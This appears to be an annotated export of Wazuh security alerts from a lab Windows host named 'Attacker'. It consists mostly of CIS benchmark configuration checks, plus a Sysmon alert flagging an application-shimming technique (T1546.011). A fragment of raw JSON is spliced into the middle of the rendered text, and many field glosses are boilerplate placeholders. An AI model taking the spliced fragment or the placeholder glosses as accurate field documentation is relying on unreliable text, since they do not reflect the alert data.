rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on behavior monitoring' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.9.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.7']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2632663
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26326
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn on behavior monitoring' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to configure behavior monitoring for Microsoft Defender Antivirus. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn on behavior monitoring. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.9.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on script scanning' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on script scanning' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.227+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.227+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on script scanning' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.9.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.7']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2635900
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26327
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn on script scanning' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows script scanning to be turned on/off. Script scanning intercepts scripts then scans them before they are executed on the system. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn on script scanning. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.9.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Watson events' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Watson events' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.243+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.243+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Watson events' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.11.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2639213
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26328
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure Watson events' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to configure whether or not Watson events are sent. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Watson events are the reports that get sent to Microsoft when a program or service crashes or fails, including the possibility of automatic submission. Preventing this information from being sent can help reduce privacy concerns.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Reporting\Configure Watson events. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.11.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Scan removable drives' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Scan removable drives' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.274+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Scan removable drives' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.3']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.12.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.4']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gpg_13:  ['4.3']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr_IV:  ['35.7.d']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2642421
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26329
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Scan removable drives' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to manage whether or not to scan for malicious software and unwanted software in the contents of removable drives, such as USB flash drives, when running a full scan. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  It is important to ensure that any present removable drives are always included in any type of scan, as removable drives are more likely to contain malicious software brought in to the enterprise managed environment from an external, unmanaged computer.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Scan\Scan removable drives. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.12.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  CM.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gpg_13:  4.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.gdpr_IV:  35.7.d
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.b
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Scan']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
$ if local drives are shared they are left vulnerable to intruders who want to exploit the data that is stored on them. the recommended state for this setting is: enabled.", "data.sca.check.rationale": "data could be forwarded from the user's remote desktop services session to the user's local computer without any direct user interaction. malicious software already present on a compromised server would have direct and stealthy disk access to the user's local computer during the remote desktop session.", "data.sca.check.remediation": "to establish the recommended configuration via gp, set the following ui path to enabled: computer configuration\\policies\\administrative templates\\windows components\\remote desktop services\\remote desktop session host\\device and resource redirection\\do not allow drive redirection. note: this group policy path is provided by the group policy template terminalserver.admx/adml that is included with all versions of the microsoft windows administrative templates.", "data.sca.check.compliance.cis": "18.9.65.3.3.3", "data.sca.check.compliance.pci_dss": "4.1", "data.sca.check.compliance.hipaa": "164.312.a.2.iv,164.312.e.1,164.312.e.2.i,164.312.e.2.ii", "data.sca.check.compliance.nist_800_53": "sc.8", "data.sca.check.compliance.tsc": "cc6.1,cc6.7,cc7.2", "data.sca.check.registry": ["hkey_local_machine\\software\\policies\\microsoft\\windows nt\\terminal services"], "data.sca.check.result": "failed", "location": "sca", "_severity_score": 7, "_severity_label": "medium", "_severity_reason": "behaviour\u2011based score \u2265\u00a06"}'>

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.431+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.431+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.65.3.3.3']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2646145
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26340
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Do not allow drive redirection' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting prevents users from sharing the local drives on their client computers to Remote Desktop Servers that they access. Mapped drives appear in the session folder tree in Windows Explorer in the following format: \\TSClient\$ If local drives are shared they are left vulnerable to intruders who want to exploit the data that is stored on them. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Data could be forwarded from the user's Remote Desktop Services session to the user's local computer without any direct user interaction. Malicious software already present on a compromised server would have direct and stealthy disk access to the user's local computer during the Remote Desktop session.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Remote Desktop Services\Remote Desktop Session Host\Device and Resource Redirection\Do not allow drive redirection. Note: This Group Policy path is provided by the Group Policy template TerminalServer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.65.3.3.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  4.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.nist_800_53:  SC.8
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:11.782+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:11.782+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535011.2650331
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:50:00.8040331Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2429
Incremental log record number – handy for timeline order.

data.win.system.processID:  11200
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:49:00Z. Reason: RulesEngine."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  2025-04-25T22:49:00Z, RulesEngine
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Application Compatibility Database launched

🧠 What happened? Application Compatibility Database launched

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:50:28.818+0000 | 🧠 MITRE: ['Privilege Escalation', 'Persistence'] – ['Application Shimming'] [T1546.011]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1546.011

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:28.818+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Application Compatibility Database launched
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92058
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1546.011']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Privilege Escalation', 'Persistence']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Application Shimming']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535028.2651913
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:50:26.9576523Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  345991
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
